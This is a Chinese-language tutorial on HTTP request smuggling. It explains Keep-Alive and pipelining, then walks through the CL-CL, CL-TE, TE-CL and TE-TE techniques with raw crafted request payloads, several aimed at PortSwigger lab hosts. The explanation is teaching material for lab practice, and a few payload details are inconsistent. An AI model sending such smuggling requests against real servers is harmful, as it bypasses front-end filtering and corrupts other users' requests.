HTTP 请求走私
1 前言
1.1 Keep-Alive
在 HTTP 1.0 之前的协议设计中,客户端每进行一次 HTTP 请求,就需要同服务器建立一个 TCP 链接。而现代的 Web 网站页面是由多种资源组成的,我们要获取一个网页的内容,不仅要请求 HTML 文档,还有 JS、CSS、图片等各种各样的资源,这样如果按照之前的协议设计,就会导致 HTTP 服务器的负载开销增大。于是在 HTTP 1.1 中,增加了 Keep-Alive 和 Pipeline 这两个特性。
Keep-Alive 是什么?就是在 HTTP 请求中增加一个特殊的请求头 Connection: Keep-Alive,告诉服务器,接收完这次 HTTP 请求后,不要关闭 TCP 链接,后面对相同目标服务器的 HTTP 请求,重用这一个 TCP 链接,这样只需要进行一次 TCP 握手的过程,可以减少服务器的开销,节约资源,还能加快访问速度。当然,这个特性在 HTTP 1.1 中是默认开启的。
1.2 Pipeline
有了 Keep-Alive 之后,后续就有了 Pipeline,在这里呢,客户端可以像流水线一样发送自己的 HTTP 请求,而不需要等待服务器的响应,服务器那边接收到请求后,需要遵循先入先出机制,将请求和响应严格对应起来,再将响应发送给客户端。现在,浏览器默认是 不启用 Pipeline 的,但是一般的服务器都提供了对 Pipeline 的支持。
1.3 原理
反向代理服务器与后端的源站服务器之间,会重用 TCP 链接,因为代理服务器与后端的源站服务器的 IP 地址是相对固定,不同用户的请求通过代理服务器与源站服务器建立链接,所以就顺理成章了。
但是由于两者服务器的实现方式不同,如果用户提交模糊的请求可能代理服务器认为这是一个 HTTP 请求,然后将其转发给了后端的源站服务器,但源站服务器经过解析处理后,只认为其中的一部分为正常请求,剩下的那一部分就是走私的请求了,这就是 HTTP 走私请求的由来。
HTTP 请求走私漏洞的原因是由于 HTTP 规范提供了两种不同方式来指定请求的结束位置,它们是 Content-Length
标头和 Transfer-Encoding
标头, Content-Length
标头简单明了,它以字节为单位指定消息内容体的长度。
Transfer-Encoding
标头用于指定消息体使用分块编码(Chunked Encode),也就是说消息报文由一个或多个数据块组成,每个数据块大小以字节为单位(十六进制表示) 衡量,后跟换行符,然后是块内容,最重要的是:整个消息体以大小为 0 的块结束,也就是说解析遇到 0 数据块就结束。如:
POST / HTTP/1.1
Host: ac6f1ff11e5c7d4e806912d000080058.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
b
a=11
0
其实理解起来真的很简单,相当于我发送请求,包含 Content-Length
,前端服务器解析后没有问题发送给后端服务器,但是我在请求时后面还包含了 Transfer-Encoding
,这样后端服务器进行解析便可执行我写在下面的一些命令,这样便可以绕过前端的 waf。
2 实例
2.1 CL 不为 0 的 GET 请求
假设前端代理服务器允许 GET 请求携带请求体,而后端服务器不允许 GET 请求携带请求体,它会直接忽略掉 GET 请求中的 Content-Length
头,不进行处理。这就有可能导致请求走私。
比如我们构造请求:
GET / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 44\r\n
GET / secret HTTP/1.1\r\n
Host: example.com\r\n
\r\n
前端服务器收到该请求,通过读取 Content-Length
,判断这是一个完整的请求,然后转发给后端服务器,而后端服务器收到后,因为它不对 Content-Length
进行处理,由于 Pipeline
的存在,它就认为这是收到了两个请求,分别是
# 第一个
GET / HTTP/1.1\r\n
Host: example.com\r\n
# 第二个
GET /secret HTTP/1.1\r\n
Host: example.com\r\n
2.2 CL-CL
在 RFC7230
的第 3.3.3
节中的第四条中,规定当服务器收到的请求中包含两个 Content-Length
,而且两者的值不同时,需要返回 400 错误。
但是总有服务器不会严格的实现该规范,假设中间的代理服务器和后端的源站服务器在收到类似的请求时,都不会返回 400 错误,但是中间代理服务器按照第一个 Content-Length
的值对请求进行处理,而后端源站服务器按照第二个 Content-Length
的值进行处理。
此时恶意攻击者可以构造一个特殊的请求:
POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 8\r\n
Content-Length: 7\r\n
12345\r\n
a
中间代理服务器获取到的数据包的长度为 8,将上述整个数据包原封不动的转发给后端的源站服务器,而后端服务器获取到的数据包长度为 7。当读取完前 7 个字符后,后端服务器认为已经读取完毕,然后生成对应的响应,发送出去。而此时的缓冲区去还剩余一个字母 a
,对于后端服务器来说,这个 a
是下一个请求的一部分,但是还没有传输完毕。此时恰巧有一个其它的正常用户对服务器进行了请求,假设请求如图所示:
GET /index.html HTTP/1.1\r\n
Host: example.com\r\n
从前面我们也知道了,代理服务器与源站服务器之间一般会重用 TCP 连接。
这时候正常用户的请求就拼接到了字母 a
的后面,当后端服务器接收完毕后,它实际处理的请求其实是:
aGET /index.html HTTP/1.1\r\n
Host: example.com\r\n
这时候用户就会收到一个类似于 aGET request method not found
的报错。这样就实现了一次 HTTP 走私攻击,而且还对正常用户的行为造成了影响,而且后续可以扩展成类似于 CSRF 的攻击方式。
但是两个 Content-Length
这种请求包还是太过于理想化了,一般的服务器都不会接受这种存在两个请求头的请求包。但是在 RFC2616
的第 4.4 节中,规定: 如果收到同时存在 Content-Length 和 Transfer-Encoding 这两个请求头的请求包时,在处理的时候必须忽略 Content-Length
,这其实也就意味着请求包中同时包含这两个请求头并不算违规,服务器也不需要返回 400
错误。服务器在这里的实现更容易出问题。
2.3 CL-TE
所谓 CL-TE
,就是当收到存在两个请求头的请求包时,前端代理服务器只处理 Content-Length
这一请求头,而后端服务器会遵守 RFC2616
的规定,忽略掉 Content-Length
,处理 Transfer-Encoding
这一请求头。
chunk 传输数据格式如下,其中 size 的值由 16 进制表示。
Lab 地址: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
构造数据包:
POST / HTTP/1.1\r\n
Host: ace01fcf1fd05faf80c21f8b00ea006b.web-security-academy.net\r\n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n
Accept-Language: en-US,en;q=0.5\r\n
Cookie: session=E9m1pnYfbvtMyEnTYSe5eijPDC04EVm3\r\n
Connection: keep-alive\r\n
Content-Length: 6\r\n
Transfer-Encoding: chunked\r\n
\r\n
0\r\n
\r\n
G
连续发送几次请求就可以获得该响应:
2.4 TE-CL
所谓 TE-CL
,就是当收到存在两个请求头的请求包时,前端代理服务器处理 Transfer-Encoding
这一请求头,而后端服务器处理 Content-Length
请求头。
Lab 地址: https://portswigger.net/web-security/request-smuggling/lab-basic-te-cl
构造数据包:
POST / HTTP/1.1\r\n
Host: ac041f531eabd0cd804edb62000c0025.web-security-academy.net\r\n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n
Accept-Language: en-US,en;q=0.5\r\n
Cookie: session=3Eyiu83ZSygjzgAfyGPn8VdGbKw5ifew\r\n
Content-Length: 4\r\n
Transfer-Encoding: chunked\r\n
\r\n
12\r\n
GPOST / HTTP/1.1\r\n
\r\n
0\r\n
\r\n
由于前端服务器处理 Transfer-Encoding
,当其读取到 0\r\n\r\n
时,认为是读取完毕了,此时这个请求对代理服务器来说是一个完整的请求,然后转发给后端服务器,后端服务器处理 Content-Length
请求头,当它读取完 5c\r\n
之后,就认为这个请求已经结束了,后面的数据就认为是另一个请求了,也就是:
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
2.5 TE-TE
TE-TE
,也很容易理解,当收到存在两个请求头的请求包时,前后端服务器都处理 Transfer-Encoding
请求头,这确实是实现了 RFC 的标准。不过前后端服务器毕竟不是同一种,这就有了一种方法,我们可以对发送的请求包中的 Transfer-Encoding
进行某种混淆操作,从而使其中一个服务器不处理 Transfer-Encoding
请求头。从某种意义上还是 CL-TE
或者 TE-CL
。
Lab 地址: https://portswigger.net/web-security/request-smuggling/lab-ofuscating-te-header
构造数据包:
POST / HTTP/1.1\r\n
Host: ac4b1fcb1f596028803b11a2007400e4.web-security-academy.net\r\n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:56.0) Gecko/20100101 Firefox/56.0\r\n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n
Accept-Language: en-US,en;q=0.5\r\n
Cookie: session=Mew4QW7BRxkhk0p1Thny2GiXiZwZdMd8\r\n
Content-length: 4\r\n
Transfer-Encoding: chunked\r\n
Transfer-encoding: cow\r\n
\r\n
5c\r\n
GPOST / HTTP/1.1\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 15\r\n
\r\n
x=1\r\n
0\r\n
\r\n
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
上一篇: 内网隧道穿透
下一篇: MyBatis 介绍和使用
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论